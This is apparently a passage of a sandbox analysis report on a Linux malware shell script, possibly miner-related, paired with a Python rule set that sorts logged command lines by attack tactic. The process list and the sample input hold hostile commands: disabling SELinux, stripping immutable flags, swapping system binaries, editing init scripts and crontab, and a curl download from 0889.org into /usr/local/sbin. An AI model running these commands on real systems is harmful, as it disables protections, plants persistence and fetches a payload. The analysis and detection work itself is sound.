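     lambda a: _base(a) == "cp" and len(a) >= 3 and a[-1] in SYSBINS),
    ("defense_evasion", "Edits init scripts/crontab in place",
     lambda a: _base(a) == "sed" and "-i" in a
     and (a[-1].startswith("/etc/init.d/") or a[-1] == "/etc/crontab")),
    ("persistence", "Removes rc.d links",
     lambda a: _base(a) == "find" and len(a) > 1 and a[1].startswith("/etc/rc")
     and "-exec" in a and "rm" in a),
    ("persistence", "Modifies init.d",
     lambda a: _base(a) == "ln" and RC_LINK.match(a[-1]) is not None),
    ("defense_evasion", "File and Directory Permissions Modification",
     lambda a: _base(a) == "chmod" and any(x.startswith(("/etc/",) + BIN_DIRS) for x in a[2:])),
    ("discovery", "Enumerates running processes",
     lambda a: _base(a) in ("pkill", "pgrep", "killall")),
    ("persistence", "Write file to user bin folder",
     lambda a: _base(a) in ("curl", "wget")
     and any(v.startswith(BIN_DIRS) for v in _flag_values(a, "-o") + _flag_values(a, "-O"))),
]


def classify(cmdline):
    """Return [(tactic, rule)] for one command line; [] when no rule matches."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:            # unbalanced quote in a raw log line: fall back to whitespace split
        argv = cmdline.split()
    if not argv:
        return []
    return [(tactic, name) for tactic, name, pred in RULES if pred(argv)]


def triage(cmdlines):
    """Map each flagged command line to its hits and tally hits per tactic."""
    hits = {}
    for c in cmdlines:
        h = classify(c)
        if h:
            hits[c] = h
    tally = Counter(t for h in hits.values() for t, _ in h)
    return hits, tally


# Constructed input: command lines copied from the behavioral1 Processes list.
SAMPLE = [
    "setenforce 0",
    "find / -maxdepth 1 -name *.mod",
    "chattr -ia /bin/ps",
    "chattr -ia /etc/crontab",
    "cp -f /usr/bin/dpkgd/ps /usr/bin/ps",
    r"sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab",
    r"sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh",
    "sort -u",
    "mount",
    "find /etc/rc2.d/ -name *selinux* -exec rm -f {} +",
    "pkill xmrig",
    "chmod 755 /etc/init.d/selinux /etc/init.d/crontabs",
    "chattr +ia /etc/init.d/selinux /etc/init.d/crontabs",
    "ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux",
    "curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron",
]

if __name__ == "__main__":
    flagged, tally = triage(SAMPLE)
    for cmd, h in flagged.items():
        print(f"{cmd[:60]:60} {h}")
    print(dict(tally))
```

Each rule keys on the binary plus the argument that makes the call abnormal (the target path, the flag direction, the rc-link name) rather than on the binary alone, which is what keeps `sort -u`, `mount` and the single `find / -maxdepth 1` in the sample from firing; the report's own "File and Directory Permissions Modification" hit, by contrast, triggers on any chmod.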

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
US 1.1.1.1:53 0889.org udp
US 1.1.1.1:53 0889.org udp
GB 185.125.188.62:443 N/A tcp
GB 185.125.188.62:443 N/A tcp
US 151.101.193.91:443 N/A tcp
US 151.101.193.91:443 N/A tcp
GB 195.181.164.14:443 N/A tcp

Files

The /etc/sedXXXXXX and /etc/init.d/sedXXXXXX entries are the temporaries created by the sed -i commands under Processes (each holds the edited copy of /etc/crontab or of an existing init script), so their hashes describe modified files on this VM image rather than payloads dropped by the sample.

/etc/sedTc6x7S

MD5 8f111d100ea459f68d333d63a8ef2205
SHA1 077ca9c46a964de67c0f7765745d5c6f9e2065c3
SHA256 0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354
SHA512 d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

/etc/init.d/sedy6LbFS

MD5 2ba41d3445b3052d9d2d170b7a9c30dc
SHA1 2aac9677a1a8815cf504e95c4191efa4e8bf277c
SHA256 d1bed899252d0ce9df29a9f46f2883f3a66ac084557757b2ee0300fc03f442e1
SHA512 40694eee83d8c9f2b22651cb51bf3827659ef8e58e5d127b117b7fdf8c42685525e9bbb8270c8e47043a71ff62218d9dc977d29aff5b7a0205c461af70cd53d8

/etc/init.d/sedjEUNSW

MD5 9b392bac8c24330ad47478a5038ead13
SHA1 6c3050598d168c42dc688cecb77fe478211c3ab9
SHA256 d054fee005a1aa4363200512769a6aef7aad68fc4c9947b8f8c417615727f07f
SHA512 2a4da94b1f58ce1e3dab46a9e32417da710d9049028858cca0a0003305c38658f9bbe0b06ec04cdea26cab02fbd0a9fe44f36e277c087bdbf66763e6bc0f7462

/etc/init.d/sedDFOGpV

MD5 cda555b495531d9519e1759015d8254b
SHA1 d24025f32795eb1156c8cf6ed431b0d62c371e0b
SHA256 bada520ca2c152cc2a4ce0507dae5525bd3edc0b83c1ac4b460b77a90e4667d4
SHA512 8a67db9e0dc5f95ec72f9bc07b7b9748ad23b272acaebff9cc1748b59e493ab6761e5e68fc9fe0e0b3783a13eba652b7f6bd5761cf0bbe4f684dabe21e543f46

/etc/init.d/sedUHt3QU

MD5 458ba0335ba2c1c2dce836092bc736d6
SHA1 ae5d8e397170d4aa1449ad21202c192822965300
SHA256 e6e7f380dcf27f1af57e69b89683892cf84364a1c70a6830a869da24834a481a
SHA512 3e6aea402485a84f63d8a1e984b67f4c9ef8c002f62998953c86dfbc9895057af5c9f9e201d2e478b74c49d8f8f0a526899225cdf65850f54e0992e50e8fcb9f

/etc/init.d/sed95Ns9Y

MD5 3d51dc9135014bb49b4a19ff8dab61f1
SHA1 da7e67342302a2ccb0b28b3fdc3005fded638dd8
SHA256 b80a447135b01da97780c2c5b7876ded18d788940a5365bc308d68b0d1a736cc
SHA512 9e90166259db2e64554529003cc090bce5d4b3585dd05ae2c8392058340f96b7d32a04641436a0291e2e5892391420cd3c6eca10a27b241d3dacc47b85c0b152

/etc/init.d/sedWoCetZ

MD5 ce2de503acc3de02f544571e89d4d717
SHA1 5d767b14666d82389475868f153a38594acce7ae
SHA256 52da7743f31954a5fbe1c312dd4112a671fec9efaa1f9812926a8d97543ba0e2
SHA512 2a0cd9e9cbfa7f5d6a4bfa66eef9200ab5fb12ea645496135a42afa5d2ccd5fb4ae36d306138f1ef2094a512f347bdcdd4780fbd19ade74156c9cd9dfea55440

/etc/init.d/sed9ofuDY

MD5 03975a59225fad7d7c28e133de85d249
SHA1 6f72b3b528550f16a2109bc9d86004180d7d734f
SHA256 42be3e66d014a04eb1cbccd57b3a4ef2c92b268798e2322ec87582271b9fed65
SHA512 e5b4028bd0ad53b76328f5f124ca9e88b1fc42b3617004a06c0954843a4586fb972763008bb96bd681003e5869952fc2678b65e7e5a5892f95efc618633f006e

/etc/init.d/sedAxh40X

MD5 7e648c77846d70c4ef1b49c0c4f7cfad
SHA1 92bff2c0b65410bfeb8cde8089888f4a22b73e44
SHA256 2e317e678625e7c41348f15d2fb8fd65fd2ba732da05bf89660de2b36558e405
SHA512 054e9102ab3f8799d8ff6c07d82ba571fb72ce9d5eab8fca50ff055608333e6f6ef2805cf349cd2c9ae793fc9c2fad8e11f52d455517e3ea118f0780b89d0a4a

/etc/init.d/sedhV0UxX

MD5 33ed7811d65a775cf10f04c2e6ee3cbf
SHA1 004e8008b0f8dda526e982e148eb39c207af44b8
SHA256 29ad66aed4b605c1ff65d42c89f5b68f570c88c1d5764f45dcf15384302b86fe
SHA512 1f732ab834a000734d06a5242e0fd174a09aa76771b00d27d5c15169bcf26cec8c04af6395eb42382ce1585247f83065cecbf6b7661ad91e38b4f5a202f7b0c6

/etc/init.d/sed2Wb2GX

MD5 510488b5120b580b673a15b75a5498b0
SHA1 0f667545ae788ae46ccc7045dc7975f044a76fd2
SHA256 a4fecda40d06d41cab9892b8c2832d3f41d333d944a91a9bc7334540d1cada26
SHA512 3fdcaea110abc6d7be70f52341ff7f523de70afa571ccdc88cdf6e1fab264cae2f70fa2cd8be0ccaa9de0cae2db9baa6139fb951f78e50a78a7ac1d7afb06821

/etc/init.d/sedzJUsG1

MD5 85d7a3783889ea93dcda2fb488420c1c
SHA1 8edf95b211ad7e8df3ee2a331c4e658e9b746e5c
SHA256 2df15277374dedbff7fb792f22e42a72c75fbfc73414ccc87e07f49d377ad9d0
SHA512 9abf28183e952b372423ec48c3b20cd218cfd76b50138ced0dd1969f7be66e0697cbcaee28d71984c46369ea14f9a62a8061ee992ddc2ca2b186c87b689dc3e9

/etc/init.d/seduODJR1

MD5 e65fcf1c65d0f1dfd2495caba916da2c
SHA1 954ce99138d3ba784163c8aaf940697b5052a1f2
SHA256 2117dc14baa0865740861453d359ff186d793a82ee9d8cb848f673814b114ed5
SHA512 1b8a2c9cb7a435326ac3281d22346acc648096a59a6cf94b8a9f5063ce3341c3e2b5e527477d7554862f57776798d2e5d002a90f024cb3e8514cc16bb919cceb

/etc/init.d/sedf0ume1

MD5 193d680f0eec5280efef2e9cf9db9669
SHA1 775d985dd5e016882657620a66aa149ac438a25f
SHA256 ff9fe5260a3acc455c3c52f7812b167d7f3010ad24bcf23c0f4bed6eee92bbb2
SHA512 655cafe8366a5e3327a1335c18af3c00fa6fdfef0ec5d3e2aa46634272842abd89732b59705ec291f5ccc2fdfa2412e1bf0dadc809958e8672180e1abf2be076

/etc/init.d/seduA5xv0

MD5 ec9a7d183ec50837a12aca3f9c95cc27
SHA1 396a23fa1d6e8a871d69786d14fd1ce4e4cba583
SHA256 c82a6b52fad02e7f7e33184a9b917fe966b20eb6afce27fb3b8c6e799f8df8a0
SHA512 ec1f384a5bc7e2a67b99838644346ea1391b5b75e7bcc1a1ea6d59f07418da7553175c8f43869ff352c0b7aa80cb26ccdc5f42c3dde9029917cebc520a19e85b

/etc/init.d/sedPHaP3Z

MD5 a9ad994be904ef8c646c6044e01cb30a
SHA1 2e87087451b7e04f64209d66c25ae1c12ab25f49
SHA256 f90e0e478d4343071c2367319db5145621924b293bd81da4310abd22ff4ceb3f
SHA512 d9bffc5c302126b65e32f34c564f2b5c5e28705a196ae8e50ba7583e7c3849d76d98cc024ed5faa805f921479a425e1bca06f1c49106be78a01f94c790b7cfbb

/etc/init.d/sedivgDd0

MD5 9932c03664a6acd9f23afdbcf91478cb
SHA1 73b78fcd63c788f1a977c604a760eae6f8f60881
SHA256 1711fba8077fe12a1db8f26e0f06f32ee06921029deb0be773368878e135832a
SHA512 7a0432d9a5da508df34691091a0de13a4c009a5ec9d479eb5b55bde2d3e5c3fad1f0fa423a67b618246e5af83c163da52b49908a772b7a499f2cbec23e5229d2

/etc/init.d/sed9jkXc4

MD5 561b38cf0171ef9aa41954dad9ec6b3c
SHA1 93db75a3b83ab12a3cd8859d5417e8ba036f0241
SHA256 6b0c5c1234b1f749b4af91bc9bbbd9989d98b267fae416a495891937e010c67b
SHA512 2b0f9eb9fde3f7a8f8d3ff286acfc034d5c046da789ed25ce29540b8ca89b6fb86cf44c6d8823423d9515dc20400f49016676c4a940640a2384bb87902e125d1

/etc/init.d/sedItU9o3

MD5 1ca5c0743fa797ffa364db95bb8d8d8e
SHA1 6de496930dfe00e705fa244d77e7dfa2d1c6aef8
SHA256 a919f9434b681974a2f1d4120af10c0527b30e8cda6fdec1dea1eee3077b6609
SHA512 044c6136b2085066e71f15a942b341c54fcfe97f754a10d6e91971c150214e9be014cb96e83d8ae4dee51129f5b44a41c663598f9430e9c4cc93f5675b625b5f

/etc/init.d/sed7uNT72

MD5 341bea96d3abe6f0dd2a67af3442fbc6
SHA1 0b2afe13ecb26b68db5b4227fd56c93a87cbc5db
SHA256 30796f5c362f7c7503e7dec44c7bf66ae9f9949c087f094cb946439480648136
SHA512 4c6747ff899b8e5b101cd58b29094a59627f2466376835856b5425abfd832617ee13eb50b70cf2d7fb09e2957726acd0a3a985a358dd3bf637e52a0fd689779d

/etc/init.d/sedIOKVd3

MD5 2e43c47bae9d14535654c575776a3d69
SHA1 1d6838ee128ed25b278ce57d23a3eacf27c3e3aa
SHA256 f6421e3b8d3a526047f8f613af03493ec5cb2cee15bac760385bd658a5a86497
SHA512 0531a9ba9646cf97eae0028ac9ac273dda5cf7cb7ff95d2c079d2dacd80e99a72fb1cc5106171a3f1fa2cacc8120fc30a557aab8bca4e0ffba6890e958f61013

/etc/init.d/sedHcZzv2

MD5 b868200c6e36ef87e27ead9a3ddad2db
SHA1 b1cc85e63d4302b020a4679971b6c363c9392d63
SHA256 5895801d6256ce6c2a65760e01db8ffd8b90a9bf80294e9a358423b3d4ce59d1
SHA512 f3dba21b0bb340c4742e5facd042180d66541010cc25f00e223cf545a78550184571951f5ac6c7c35a3840d08a6a07f89e78316c9f7cb65108c0558c3a5e9d0a

/etc/init.d/sed4AVVs6

MD5 82698019c962069b438bd2a82d9fa1e7
SHA1 2ad758cc8614f4c8368e8e7eb71b92f0ff2e8305
SHA256 65044cf080c0edd9bd6ba75e1a8e8d0f300930d590257c6d6ce28273899ad4a7
SHA512 dd64cd1f33f2cf09867363234e6791a3ebc3697aaef0d659e8e354c52fa9c4fc1c013369b28a42a831552eb888e2635e9a5d77c6619691af097c9fd2e4f0e9a9

/etc/init.d/sedVHPgf6

MD5 27013efdfe13470845c70a9e00a61fde
SHA1 2b840ac1a1d1b866ba457bd0746144c431e944ad
SHA256 c02921f45d52f6e5f324cc2cdd3cb9a00198a5b5e979cc501b16eec6a786e7f0
SHA512 0fd9e4da5dc1702970cc7b05fff801784ddeebb772f0f3b49b2e034a4927eabef1d5864345687d16388a1d59b71e7b4628978dcbdf113577413130a73d181b1d

/etc/init.d/sedqSWgm6

MD5 84d429bf52701edbd6535020d8dcebd1
SHA1 d4070380d612001c0acf1abba7d685b1b13ec520
SHA256 49272b0c0e7f45878a80e5918f571e0ba40c03448a6617b1cdfe5d70b212c845
SHA512 cfa58a71d870ce9b6a4a8be75b19670d78dfcc8cdee5489fb098f7f00a05efb72d7c92895189932088e9c2713d600a6fa7cb7a4f9edba5bd768ce6bc811fb09a

/etc/init.d/sedFhHFT5

MD5 7603d0f581e54fdbe31ad62cbb4cfd22
SHA1 3f9c40e180498da01e426ffb72a31b876e1869fc
SHA256 8b9ff7abb9fffe88c146471c36494d98d5a114aef3e298db8314b31d9e15a881
SHA512 1a98ccdadde843e6a17c97b9f5182d94cc1250d8161adc29288228d727e5c79b06aa823a3637a1489b74c32a73b643ba4355e07f5e7aba61fa8174ae1b917ded

/etc/init.d/sed6ZnCQ4

MD5 0f1be14b21796a952e115c03a86787e0
SHA1 1d25f0167fc186ce422a03dafbdf05a9994950bc
SHA256 d5345e824e0865f6f5615d8602e9141bcec1942549b3ef8792bfc17746998c84
SHA512 670fd1216b5863f26a71a939f5f072b664674acf250a87aef8b2af06aa3525cf72e256ab4507b2c5d68656c01f23bad2d28889f30117fc6b0fc07a1843baaff5

/etc/init.d/sedHZKD74

MD5 4ed1a6fd54897767efb2cfef6062e376
SHA1 a97d0e6f607c40f1f9b568b574c4d3b3141d7d79
SHA256 33213290a470b25b03b9cc9e16ccdd2cdd7991b795a1f59e277626b909bb42d4
SHA512 c4e79cd2ba8ad768a299b29bbfce3e35bd8a0172f47d89d9fb4e75aaf67bb1eae3772b4988daeb8d9dff1e9e9b7024d2973162e58858845f5170ca55bf0d660b

/etc/init.d/sedSqez28

MD5 49fbfd237be2a2f09576f1f9374580be
SHA1 e380716a856a90f5643ddd6f3655020fc2f603dd
SHA256 69219f70b7b70dacbce2f4a0fd9b2f7ac05623a285ae7abf1e798fdb72fac02e
SHA512 b6f37481d2397b79fa47e23435626166c9857a78d19b755703e867b7401fa066122d898b4d303c6629d154bd1ed19f486146878ff5fafbe1e020e821c4835cea

/etc/init.d/sedBeMLr8

MD5 c5d89677f904551f5b192f35ad98d73c
SHA1 855933c89b14174a8464633fc24e0867f5927cde
SHA256 0f4cd7733d737a110b8a48c46582ab2f88da69d32b47cffeec948f75daa0232f
SHA512 62301cd1cef7801c41f5dbc58daa0c8167d8a9aa9c1c05cf190cd8f834a872e27fd28825f23edd6a3a8a5879d4c8a8409580d4449c807651a95f6f205eeda103

/etc/init.d/sedWFScV8

MD5 bd41a0654a192d74dfb9c551b06fa855
SHA1 08e34ce46a988013dd451e21178a517388a02101
SHA256 98307d07a6e740050c06fcc3f7f95320d8865d73f6b95ac903e3dfccdbcf81f8
SHA512 d3c2a56eb76a32554b987c5a6a7e84a5780041c9f54682052bbb94e217af84c11f65827749171f457cf14c733719ad090511f606ee4afee1aabc9e966ec9b849

/etc/init.d/sedpoTtb8

MD5 0e7858707b622c18dbd8dd8e39303c44
SHA1 d39af3eea63f2f5d001491d1f0f11e6f171c6b1d
SHA256 dc7e0cbeec303c02cc4da4dcd19fdf749a7824b52d5f891f52484f1551ac9f5d
SHA512 88a2b42925fe8c2082de8b03fe218bcc848488653ecd9c8eca43ddf9906c39566a8a845fcfe32b0056bced5a4c76cb6d908a1c772a679cac18cd631e723fa419

/etc/init.d/sedEGBpj7

MD5 f1efa76005a42f5d6736dfb2f7fda02e
SHA1 fbb0fa9c5073732a1c69d3349534c380fa13ffc9
SHA256 70637da86bb196291f687c0e8b2276dd92b1d8e1b7fe6a4b507ce90e5a74fd4c
SHA512 211b78fe6a71b212847a139583cbb8fb99adb453d85a0d35a752e54d22d60c5392273637d96ad3dead5afb4148589eafc3c41ad6f871abb2bb9eb5ee2e4d8bfc

/etc/init.d/sedniYnE7

MD5 2f220a9e28aaf30a8250410622599d53
SHA1 6f8f0a918c62a5ce8129ff479f5ded293cba34d9
SHA256 026f26971b2fc4221ab1c30af5ebc61b0b07042bd2ddc98c470b8d897f38119f
SHA512 5895ee7345ea1dc3849362beb997ff29a14e6a005c697376f9629855956fee7b35d35ac76070d39a1e357dd2ea887f5c74646eb9c1eecf7a3a685fa98545a072

/etc/init.d/sed6AQ9Lb

MD5 a2fba832eab9066d85f27ee56ac9fad4
SHA1 1a52a8f623f7fdb8e2bbc2f8d4034677be09e117
SHA256 f123397655c0e07f05204406a387b15213cdc1fd5369b7313f5f79ea564c010a
SHA512 d5a0742c684b24031b4c7dcd039eb28f61d7e764cd014d1e015bb7d099d1a665dc3b1232208c5b927e5ace79c111f1e159892b0a6c4bd4c33018d0e7792a73d1

/etc/init.d/sedxP3LUa

/etc/init.d/sedAPrblb

/etc/init.d/sedpxfBNa

/etc/init.d/sedkz6RZ9

/etc/init.d/sed0GUKie

/etc/init.d/sedZQsazd

/etc/init.d/sedQvKbJd

/tmp/sh-thd.BubyqF

/etc/init.d/crontabs

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 23:20

Reported

2024-11-13 23:23

Platform

debian9-armhf-20240418-en

Max time kernel

149s

Max time network

13s

Command Line

[/tmp/HMtWYpJGZVUZkrQK.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /bin/sed N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A

Disables SELinux

defense_evasion
Description Indicator Process Target
N/A N/A /usr/sbin/setenforce N/A

Enumerates running processes

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/sedxXliUx /bin/sed N/A
File opened for modification /etc/init.d/sedxJDWUg /bin/sed N/A
File opened for modification /etc/init.d/selinux /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/crontabs /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/sedXptBrl /bin/sed N/A
File opened for modification /etc/init.d/sedqz14Ln /bin/sed N/A
File opened for modification /etc/init.d/sedQAct27 /bin/sed N/A
File opened for modification /etc/init.d/sedjSL3gO /bin/sed N/A
File opened for modification /etc/init.d/sed1G2Nou /bin/sed N/A
File opened for modification /etc/init.d/sedKYm7AI /bin/sed N/A
File opened for modification /etc/init.d/sedkEQzHQ /bin/sed N/A
File opened for modification /etc/init.d/sedO2yYB2 /bin/sed N/A
File opened for modification /etc/init.d/sed3w2aIn /bin/sed N/A
File opened for modification /etc/init.d/sedAWxBX7 /bin/sed N/A
File opened for modification /etc/init.d/sed4Pejsj /bin/sed N/A
File opened for modification /etc/init.d/sedshh05b /bin/sed N/A
File opened for modification /etc/init.d/sedNfkxxe /bin/sed N/A
File opened for modification /etc/init.d/sedEf5nzK /bin/sed N/A
File opened for modification /etc/init.d/sedJgobeX /bin/sed N/A
File opened for modification /etc/init.d/sedQjVLAv /bin/sed N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/267/status /usr/bin/pkill N/A
File opened for reading /proc/678/cmdline /usr/bin/pkill N/A
File opened for reading /proc/18/status /usr/bin/pkill N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/29/status /usr/bin/pkill N/A
File opened for reading /proc/317/status /usr/bin/pkill N/A
File opened for reading /proc/15/cmdline /usr/bin/pkill N/A
File opened for reading /proc/5/status /usr/bin/pkill N/A
File opened for reading /proc/19/status /usr/bin/pkill N/A
File opened for reading /proc/42/status /usr/bin/pkill N/A
File opened for reading /proc/217/cmdline /usr/bin/pkill N/A
File opened for reading /proc/647/cmdline /usr/bin/pkill N/A
File opened for reading /proc/6/status /usr/bin/pkill N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/9/cmdline /usr/bin/pkill N/A
File opened for reading /proc/15/cmdline /usr/bin/pkill N/A
File opened for reading /proc/308/cmdline /usr/bin/pkill N/A
File opened for reading /proc/22/cmdline /usr/bin/pkill N/A
File opened for reading /proc/152/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/status /usr/bin/pkill N/A
File opened for reading /proc/308/cmdline /usr/bin/pkill N/A
File opened for reading /proc/595/status /usr/bin/pkill N/A
File opened for reading /proc/641/cmdline /usr/bin/pkill N/A
File opened for reading /proc/43/cmdline /usr/bin/pkill N/A
File opened for reading /proc/27/status /usr/bin/pkill N/A
File opened for reading /proc/317/cmdline /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/bin/find N/A
File opened for reading /proc/6/cmdline /usr/bin/pkill N/A
File opened for reading /proc/318/status /usr/bin/pkill N/A
File opened for reading /proc/142/cmdline /usr/bin/pkill N/A
File opened for reading /proc/304/cmdline /usr/bin/pkill N/A
File opened for reading /proc/15/status /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/bin/find N/A
File opened for reading /proc/28/cmdline /usr/bin/pkill N/A
File opened for reading /proc/304/status /usr/bin/pkill N/A
File opened for reading /proc/20/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2/status /usr/bin/pkill N/A
File opened for reading /proc/27/status /usr/bin/pkill N/A
File opened for reading /proc/748/cmdline /usr/bin/pkill N/A
File opened for reading /proc/269/cmdline /usr/bin/pkill N/A
File opened for reading /proc/5/status /usr/bin/pkill N/A
File opened for reading /proc/110/status /usr/bin/pkill N/A
File opened for reading /proc/640/status /usr/bin/pkill N/A
File opened for reading /proc/635/cmdline /usr/bin/pkill N/A
File opened for reading /proc/143/status /usr/bin/pkill N/A
File opened for reading /proc/2/status /usr/bin/pkill N/A
File opened for reading /proc/12/status /usr/bin/pkill N/A
File opened for reading /proc/143/cmdline /usr/bin/pkill N/A
File opened for reading /proc/678/cmdline /usr/bin/pkill N/A
File opened for reading /proc/319/cmdline /usr/bin/pkill N/A
File opened for reading /proc/19/cmdline /usr/bin/pkill N/A
File opened for reading /proc/267/status /usr/bin/pkill N/A
File opened for reading /proc/642/cmdline /usr/bin/pkill N/A
File opened for reading /proc/28/cmdline /usr/bin/pkill N/A
File opened for reading /proc/269/status /usr/bin/pkill N/A
File opened for reading /proc/757/status /usr/bin/pkill N/A
File opened for reading /proc/15/status /usr/bin/pkill N/A
File opened for reading /proc/636/status /usr/bin/pkill N/A
File opened for reading /proc/273/cmdline /usr/bin/pkill N/A
File opened for reading /proc/268/status /usr/bin/pkill N/A
File opened for reading /proc/43/cmdline /usr/bin/pkill N/A
File opened for reading /proc/647/status /usr/bin/pkill N/A
File opened for reading /proc/318/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3/status /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/sh-thd.QtKxCq /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /tmp/sh-thd.JBfcky /tmp/HMtWYpJGZVUZkrQK.sh N/A

Processes

/tmp/HMtWYpJGZVUZkrQK.sh

[/tmp/HMtWYpJGZVUZkrQK.sh]

/usr/sbin/setenforce

[setenforce 0]

/usr/bin/find

[find / -maxdepth 1 -name *.mod]

/usr/bin/chattr

[chattr -ia /bin/ps]

/usr/bin/chattr

[chattr -ia /usr/bin]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/bin/cp

[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]

/bin/cp

[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]

/bin/cp

[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/exim4]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]

/bin/sed

